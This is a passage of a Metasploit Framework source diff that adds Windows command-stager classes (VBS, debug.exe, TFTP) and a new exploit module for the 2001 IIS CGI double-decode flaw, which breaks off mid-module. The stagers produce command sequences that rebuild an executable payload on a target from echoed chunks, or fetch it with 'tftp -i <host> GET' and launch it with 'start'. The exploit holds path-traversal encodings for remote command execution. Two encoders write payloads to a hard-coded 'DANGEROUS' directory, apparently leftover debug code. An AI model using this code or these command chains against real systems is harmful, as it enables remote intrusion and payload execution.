+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerDebugWrite
+
+	include Msf::Exploit::CmdStager
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe file-writing decoder stub to use.',
+					File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerDebugWrite.new(exe)
+	end
+
+	def execute_cmdstager(opts = {})
+		opts.merge!({ :decoder => datastore['DECODERSTUB'] })
+		super
+	end
+
+end
+
+end
--- a/lib/msf/core/exploit/cmdstager_tftp.rb
+++ b/lib/msf/core/exploit/cmdstager_tftp.rb
@ -0,0 +1,64 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'msf/core/exploit/tftp'
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerTFTP
+
+	include Msf::Exploit::CmdStager
+	include Msf::Exploit::TFTPServer
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'TFTPHOST',  [ false, 'The address of the machine hosting the file via TFTP.' ]),
+				OptString.new( 'TFTPRSRC',  [ false, 'The filename of the TFTP-hosted resource.' ]),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerTFTP.new(exe)
+	end
+
+	def execute_cmdstager(opts = {})
+		tftphost = datastore['TFTPHOST']
+		tftphost ||= datastore['SRVHOST']
+		tftphost ||= datastore['LHOST']
+
+		@exe_tag = datastore['TFTPRSRC']
+		@exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
+
+		opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
+
+		super
+	end
+
+	#
+	# Start the service and register the file
+	#
+	def execute_cmdstager_begin(opts)
+		start_service(@exe_tag, @exe)
+	end
+
+	#
+	# Stop the service
+	#
+	def execute_cmdstager_end(opts)
+		stop_service
+	end
+
+end
+
+end
--- a/lib/msf/core/exploit/cmdstager_vbs.rb
+++ b/lib/msf/core/exploit/cmdstager_vbs.rb
@ -0,0 +1,39 @@
+##
+# $Id$
+##
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerVBS
+
+	include Msf::Exploit::CmdStager
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
+					File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerVBS.new(exe)
+	end
+
+	def execute_cmdstager(opts = {})
+		opts.merge!({ :decoder => datastore['DECODERSTUB'] })
+		super
+	end
+
+end
+
+end
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@ -14,11 +14,11 @@ module Exploit::EXE
 	def initialize(info = {})
 		super

-		register_options(
+		register_advanced_options(
 			[
 				OptString.new( 'EXETEMPLATE',  [ false, 'The executable template file name.' ]),
 				OptBool.new(   'EXEINJECT',    [ false, 'Set to preserve the original EXE function' ])
-			], Msf::Exploit::EXE)
+			], self.class)
 	end

 	def generate_exe(opts = {})
@ -29,18 +29,30 @@ module Exploit::EXE
 			opts.merge!({ :inject => true })
 		end

-		# Default to X86
-		if arch.length < 1
-			arch << ARCH_X86
+		# Prefer the target's platform/architecture information, but use
+		# the module's if no target specific information exists
+		lplat ||= target_platform
+		lplat ||= platform
+
+		larch ||= target_arch
+		larch ||= arch
+
+		# Ensure we have an array
+		if not larch.kind_of? Array
+			larch = [larch]
+		end
+
+		# Fall back to x86...
+		if (larch.length < 1)
+			larch = [ARCH_X86]
 		end

 		# Transform the PlatformList
-		plat = platform
-		if (platform.kind_of? Msf::Module::PlatformList)
-			plat = platform.platforms
+		if (lplat.kind_of? Msf::Module::PlatformList)
+			lplat = lplat.platforms
 		end

-		Msf::Util::EXE.to_executable(framework, arch, plat, payload.encoded, opts)
+		Msf::Util::EXE.to_executable(framework, larch, lplat, payload.encoded, opts)
 	end

 end
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@ -11,15 +11,22 @@ require 'msf/core/exploit/browser_autopwn'
 require 'msf/core/exploit/egghunter'
 require 'msf/core/exploit/seh'
 require 'msf/core/exploit/kernel_mode'
-require 'msf/core/exploit/cmdstager'
 require 'msf/core/exploit/exe'

+# CmdStagers
+require 'msf/core/exploit/cmdstager'
+require 'msf/core/exploit/cmdstager_vbs'
+require 'msf/core/exploit/cmdstager_debug_write'
+require 'msf/core/exploit/cmdstager_debug_asm'
+require 'msf/core/exploit/cmdstager_tftp'
+
 # Protocol
 require 'msf/core/exploit/tcp'
 require 'msf/core/exploit/udp'
 require 'msf/core/exploit/ip'
 require 'msf/core/exploit/smb'
 require 'msf/core/exploit/ftp'
+require 'msf/core/exploit/tftp'
 require 'msf/core/exploit/telnet'
 require 'msf/core/exploit/ftpserver'
 require 'msf/core/exploit/http'
--- a/lib/msf/core/exploit/tftp.rb
+++ b/lib/msf/core/exploit/tftp.rb
@ -0,0 +1,38 @@
+##
+# $Id$
+##
+
+require 'rex/proto/tftp'
+
+module Msf
+
+###
+#
+# This mixin provides a TFTPServer
+#
+###
+module Exploit::TFTPServer
+
+	def initialize(info = {})
+		super
+
+		@tftp = nil
+	end
+
+	def start_service(tag, exe)
+		@tftp = Rex::Proto::TFTP::Server.new
+		@tftp.register_file(tag, exe)
+		print_status("Starting TFTP server to host \"#{tag}\" (#{exe.length} bytes)") if datastore['VERBOSE']
+		@tftp.start
+		@tftp
+	end
+
+	def stop_service
+		print_status("Stopping TFTP server") if datastore['VERBOSE']
+		@tftp.stop
+	end
+
+	attr_accessor :tftp
+end
+
+end
--- a/lib/rex/exploitation/cmdstager.rb
+++ b/lib/rex/exploitation/cmdstager.rb
@ -1,133 +1,9 @@
-require 'rex/text'
-require 'rex/arch'
-require 'msf/core/framework'
+##
+# $Id$
+##

-module Rex
-module Exploitation
-
-###
-#
-# This class provides an interface to generating cmdstagers.
-#
-###
-
-class CmdStager
-
-	def initialize(code, framework, platform, arch = nil)
-		@var_decoder = Rex::Text.rand_text_alpha(5)
-		@var_encoded = Rex::Text.rand_text_alpha(5)
-		@var_batch   = Rex::Text.rand_text_alpha(5)
-		@decoder	    =	File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "decoder_stub") # need error checking here
-		@framework   =	framework
-		@linelen     = 2047 # covers most likely cases
-
-		# XXX: TODO: support multipl architectures/platforms
-		@exe	       = Msf::Util::EXE.to_win32pe(@framework, code)
-	end
-
-
-	#
-	# Generates the cmd payload including the h2bv2 decoder and encoded payload.
-	# The resulting commands also perform cleanup, removing any left over files
-	#
-	def generate(opts = {}, linelen = 200)
-		@linelen = linelen
-
-		# Return the output from payload_exe
-		payload_exe(opts)
-	end
-
-
-	#
-	# This does the work of actually building an array of commands that
-	# when executed will create and run an executable payload.
-	#
-	def payload_exe(opts)
-
-		persist = opts[:persist]
-
-		# Initialize an arry of commands to execute
-		cmds = []
-
-		# Add the exe building commands (write to .b64)
-		cmds += encode_payload()
-
-		# Add the decoder script building commands
-		cmds += generate_decoder()
-
-		# Make it all happen
-		cmds << "cscript //nologo %TEMP%\\#{@var_decoder}.vbs"
-
-		# If we're not persisting, clean up afterwards
-		if (not persist)
-			cmds << "del %TEMP%\\#{@var_decoder}.vbs"
-			cmds << "del %TEMP%\\#{@var_encoded}.b64"
-		end
-
-		# Compress commands into as few lines as possible.
-		new_cmds = []
-		line = ''
-		cmds.each { |cmd|
-			# If this command will fit...
-			if ((line.length + cmd.length + 4) < @linelen)
-				line << " & " if line.length > 0
-				line << cmd
-			else
-				# It won't fit.. If we don't have something error out
-				if (line.length < 1)
-					raise RuntimeError, 'Line fit problem -- file a bug'
-				end
-				# If it won't fit even after emptying the current line, error out..
-				if (cmd.length > @linelen)
-					raise RuntimeError, 'Line too long - %d bytes' % cmd.length
-				end
-				new_cmds << line
-				line = ''
-				line << cmd
-			end
-		}
-		new_cmds << line if (line.length > 0)
-
-		# Return the final array.
-		new_cmds
-	end
-
-
-	def generate_decoder()
-		# Read the decoder data file
-		f = File.new(@decoder, "rb")
-		decoder = f.read(f.stat.size)
-		f.close
-
-		# Replace variables
-		decoder.gsub!(/decode_stub/, "%TEMP%\\#{@var_decoder}.vbs")
-		decoder.gsub!(/ENCODED/, "%TEMP%\\#{@var_encoded}.b64")
-		decoder.gsub!(/DECODED/, "%TEMP%\\#{@var_batch}.exe")
-
-		# Split it apart by the lines
-		decoder.split("\n")
-	end
-
-
-	def encode_payload()
-		tmp = Rex::Text.encode_base64(@exe)
-		orig = tmp.dup
-
-		cmds = []
-		l_start = "echo "
-		l_end   = ">>%TEMP%\\#{@var_encoded}.b64"
-		xtra_len = l_start.length + @var_encoded.length + l_end.length + 1
-		while (tmp.length > 0)
-			cmd = ''
-			cmd << l_start
-			cmd << tmp.slice!(0, (@linelen - xtra_len))
-			cmd << l_end
-			cmds << cmd
-		end
-
-		cmds
-	end
-
-end
-end
-end
+require 'rex/exploitation/cmdstager/base'
+require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/debug_write'
+require 'rex/exploitation/cmdstager/debug_asm'
+require 'rex/exploitation/cmdstager/tftp'
--- a/lib/rex/exploitation/cmdstager/base.rb
+++ b/lib/rex/exploitation/cmdstager/base.rb
@ -0,0 +1,170 @@
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating cmdstagers.
+#
+###
+
+class CmdStagerBase
+
+	def initialize(exe)
+		@linemax     = 2047 # covers most likely cases
+		@exe         = exe
+	end
+
+	#
+	# Generates the cmd payload including the h2bv2 decoder and encoded payload.
+	# The resulting commands also perform cleanup, removing any left over files
+	#
+	def generate(opts = {})
+		# Allow temporary directory override
+		@tempdir = opts[:temp]
+		@tempdir ||= "%TEMP%\\"
+		if (@tempdir == '.')
+			@tempdir = ''
+		end
+
+		opts[:linemax] ||= @linemax
+
+		generate_cmds(opts)
+	end
+
+
+	#
+	# This does the work of actually building an array of commands that
+	# when executed will create and run an executable payload.
+	#
+	def generate_cmds(opts)
+
+		# Initialize an arry of commands to execute
+		cmds = []
+
+		# Add the exe building commands
+		cmds += generate_cmds_payload(opts)
+
+		# Add the decoder script building commands
+		cmds += generate_cmds_decoder(opts)
+
+		compress_commands(cmds, opts)
+	end
+
+
+	#
+	# Generate the commands to create an encoded version of the
+	# payload file
+	#
+	def generate_cmds_payload(opts)
+
+		# First encode the payload
+		encoded = encode_payload(opts)
+
+		# Now split it up into usable pieces
+		parts = slice_up_payload(encoded, opts)
+
+		# Turn each part into a valid command
+		parts_to_commands(parts, opts)
+	end
+
+	#
+	# This method is intended to be override by the child class
+	#
+	def encode_payload(opts)
+		# Defaults to nothing
+		""
+	end
+
+	#
+	# We take a string of data and turn it into an array of parts.
+	#
+	# We save opts[:extra] bytes out of every opts[:linemax] for the parts
+	# appended and prepended to the resulting elements.
+	#
+	def slice_up_payload(encoded, opts)
+		tmp = encoded.dup
+
+		parts = []
+		xtra_len = opts[:extra]
+		xtra_len ||= 0
+		while (tmp.length > 0)
+			parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
+		end
+
+		parts
+	end
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it -- example "echo " and " >>file"
+	#
+	def parts_to_commands(parts, opts)
+		# Return as-is
+		parts
+	end
+
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+		# Defaults to no commands.
+		[]
+	end
+
+
+
+	#
+	# Compress commands into as few lines as possible. Minimizes the number of
+	# commands to execute while maximizing the number of commands per execution.
+	#
+	def compress_commands(cmds, opts)
+		new_cmds = []
+		line = ''
+		concat = cmd_concat_operator
+		cmds.each { |cmd|
+
+			# If this command will fit, concat it and move on.
+			if ((line.length + cmd.length + concat.length) < opts[:linemax])
+				line << concat if line.length > 0
+				line << cmd
+				next
+			end
+
+			# The command wont fit concat'd to this line, if we have something,
+			# we have to add it to the array now.
+			if (line.length > 0)
+				new_cmds << line
+				line = ''
+			end
+
+			# If it won't fit even after emptying the current line, error out..
+			if (cmd.length > opts[:linemax])
+				raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
+			end
+
+			# It will indeed fit by itself, lets add it.
+			line << cmd
+
+		}
+		new_cmds << line if (line.length > 0)
+
+		# Return the final array.
+		new_cmds
+	end
+
+	#
+	# Can be overriden.  For exmaple, use for unix use ";" instead
+	#
+	def cmd_concat_operator
+		""
+	end
+
+end
+end
+end
--- a/lib/rex/exploitation/cmdstager/debug_asm.rb
+++ b/lib/rex/exploitation/cmdstager/debug_asm.rb
@ -0,0 +1,145 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_decoder_asm  = Rex::Text.rand_text_alpha(8) + ".dat"
+		@var_decoder_com  = Rex::Text.rand_text_alpha(8) + ".com"
+		@var_payload_in   = Rex::Text.rand_text_alpha(8) + ".dat"
+		@var_payload_out  = Rex::Text.rand_text_alpha(8) + ".exe"
+		@decoder          = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_payload_in}"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple hex encoding...
+	#
+	def encode_payload(opts)
+		File.open("/home/repository/incoming/DANGEROUS/orig.exe", "wb") { |fd| fd.write(@exe) }
+		ret = @exe.unpack('H*')[0]
+		File.open("/home/repository/incoming/DANGEROUS/orig.b64", "wb") { |fd| fd.write(ret) }
+		ret
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+		decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+		# NOTE: these two filenames MUST 8+3 chars long.
+		decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+		decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Convert the debug script to an executable...
+		cvt_cmd = ''
+		if (@tempdir != '')
+			cvt_cmd << "cd %TEMP% && "
+		end
+		cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+		cmds << cvt_cmd
+
+		# Convert the encoded payload...
+		cmds << "#{@tempdir}#{@var_decoder_com}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir}#{@var_payload_out}"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_decoder_asm}"
+			cmds << "del #{@tempdir}#{@var_decoder_com}"
+			cmds << "del #{@tempdir}#{@var_payload_in}"
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end
--- a/lib/rex/exploitation/cmdstager/debug_write.rb
+++ b/lib/rex/exploitation/cmdstager/debug_write.rb
@ -0,0 +1,139 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_bypass  = Rex::Text.rand_text_alpha(8)
+		@var_payload = Rex::Text.rand_text_alpha(8)
+		@decoder     = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_payload}"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple hex encoding...
+	#
+	def encode_payload(opts)
+		File.open("/home/repository/incoming/DANGEROUS/orig.exe", "wb") { |fd| fd.write(@exe) }
+		ret = @exe.unpack('H*')[0]
+		File.open("/home/repository/incoming/DANGEROUS/orig.b64", "wb") { |fd| fd.write(ret) }
+		ret
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Convert the debug script to an executable...
+		cvt_cmd = ''
+		if (@tempdir != '')
+			cvt_cmd << "cd %TEMP% && "
+		end
+		cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+		cmds << cvt_cmd
+
+		# Rename the resulting binary
+		cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+		# Converting the encoded payload...
+		cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_bypass}.exe"
+			cmds << "del #{@tempdir}#{@var_payload}"
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@ -0,0 +1,63 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses tftp.exe to download a binary from the specified
+# server.  The original file is preserve, not encoded at all, and so this version
+# is significantly simpler than other methods.
+#
+# Requires: tftp.exe, outbound udp connectivity to a tftp server
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerTFTP < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Initiate the download
+		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @var_payload_out}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir + @var_payload_out}"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end
--- a/lib/rex/exploitation/cmdstager/vbs.rb
+++ b/lib/rex/exploitation/cmdstager/vbs.rb
@ -0,0 +1,128 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses Windows Scripting (VBS) to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+# Requires: Windows Scripting
+# Known Issue: errors with non-ascii-native systems
+#
+# Written by bannedit
+#
+###
+
+class CmdStagerVBS < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_decoder = Rex::Text.rand_text_alpha(5)
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+		@decoder     = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decode_stub/, "#{@tempdir}#{@var_decoder}.vbs")
+		decoder.gsub!(/ENCODED/, "#{@tempdir}#{@var_encoded}.b64")
+		decoder.gsub!(/DECODED/, "#{@tempdir}#{@var_decoded}.exe")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "cscript //nologo #{@tempdir}#{@var_decoder}.vbs"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_decoder}.vbs"
+			cmds << "del #{@tempdir}#{@var_encoded}.b64"
+			# NOTE: We won't be able to delete the exe while it's in use.
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end
--- a/lib/rex/proto/tftp/server.rb
+++ b/lib/rex/proto/tftp/server.rb
@ -29,6 +29,7 @@ class Server
 		self.listen_port = port
 		self.context = context
 		self.sock = nil
+		@shutting_down = false

 		self.files = []
 		self.transfers = []
@ -55,7 +56,16 @@ class Server
 	# Stop the TFTP server
 	#
 	def stop
-		self.transfers.clear
+		@shutting_down = true
+
+		# Wait a maximum of 30 seconds for all transfers to finish.
+		start = Time.now
+		while (self.transfers.length > 0)
+			::IO.select(nil, nil, nil, 0.5)
+			dur = Time.now - start
+			break if (dur > 30)
+		end
+
 		self.files.clear
 		self.thread.kill
 		self.sock.close
@ -194,7 +204,7 @@ protected

 			#puts "%s %s %s" % [start, fn, mode]

-			if (file = self.find_file(fn))
+			if (not @shutting_down) and (file = self.find_file(fn))
 				self.transfers << {
 					:from => from,
 					:file => file,
--- a/modules/exploits/test/cmdweb.rb
+++ b/modules/exploits/test/cmdweb.rb
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# =( need more targets and perhaps more OS specific return values OS specific would be preferred

 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::CmdStager
+	include Msf::Exploit::CmdStagerVBS

 	def initialize(info = {})
 		super(update_info(info,
@ -60,37 +60,26 @@ class Metasploit3 < Msf::Exploit::Remote
 	end


+	# This is method required for the CmdStager to work...
+	def execute_command(cmd, opts)
+		uri = opts[:uri]
+		http_hash = {
+			'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
+		}
+		resp = send_request_raw(http_hash, 5)
+	end
+
 	def exploit

-		cmd_list = generate_cmdstager()
-		http_send_cmd({'uri' => "/shell/shell.jsp?cmd=CMDS"}, cmd_list, delay = 0.5)
+		opts = {
+			:delay => 0.5,
+			:uri => "/shell/shell.jsp?cmd=CMDS"
+		}
+
+		execute_cmdstager(opts)

 		handler

 	end

-
-	def http_send_cmd(opts, cmd_list, delay = 0.5)
-
-		total_bytes = 0
-		cmd_list.each { |cmd| total_bytes += cmd.length }
-
-		sent = 0
-		cmd_list.each { |cmd|
-			opts.each { |key, value|
-				value.gsub!(/CMDS/, Rex::Text.uri_encode(cmd))
-
-				resp = send_request_raw(opts, 5)
-				value.gsub!(Rex::Text.uri_encode(cmd), 'CMDS')
-
-				sent += cmd.length
-
-				# so multi threaded servers can place data in files in the correct order
-				select(nil, nil, nil, delay)
-			}
-
-			progress(total_bytes, sent)
-		}
-	end
-
 end
--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

 	include Msf::Exploit::Remote::HttpServer::HTML
-	include Msf::Exploit::CmdStager
+	include Msf::Exploit::CmdStagerVBS

 	def initialize(info = {})
 		super(update_info(info,
@ -74,9 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote

 			# build the payload
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)

-			cmds = generate_cmdstager({}, 2047, p)
+			cmds = generate_cmdstager({:linemax => 2047}, p)
 			scr = ""
 			cmds.each { |ln|
 				scr << "f.writeString('"
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@ -0,0 +1,167 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex/proto/tftp'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::CmdStagerTFTP
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution',
+			'Description'    => %q{
+					This module will execute an arbitrary payload on a Microsoft IIS installation
+				that is vulnerable to the CGI double-decode vulnerability of 2001.
+
+				NOTE: This module will leave a metasploit payload in the IIS scripts directory.
+			},
+			'Author'         => [ 'jduck' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2001-0333' ],
+					[ 'OSVDB', '556' ],
+					[ 'BID', '2708' ],
+					[ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ]
+				],
+			'DefaultTarget'  => 0
+			))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
+				OptString.new('CMD', [ false, 'Execute this command instead', nil ])
+			], self.class)
+	end
+
+
+	def dotdotslash
+		possibilities = [
+			"..%255c",
+			"..%%35c",
+			"..%%35%63",
+			"..%25%35%63",
+			".%252e/",
+			"%252e./",
+			"%%32%65./",
+			".%%32%65/",
+			".%25%32%65/",
+			"%25%32%65./"
+		]
+		possibilities[rand(possibilities.length)]
+	end
+
+
+	def mini_http_request(opts, timeout=5)
+		connect
+		req = ''
+		req << opts['method']
+		req << ' '
+		req << opts['uri']
+		req << ' '
+		req << "HTTP/1.0\r\n"
+		req << "Host: #{datastore['RHOST']}\r\n"
+		req << "\r\n"
+		sock.put(req)
+
+		# This isn't exactly awesome, but it seems to work..
+		begin
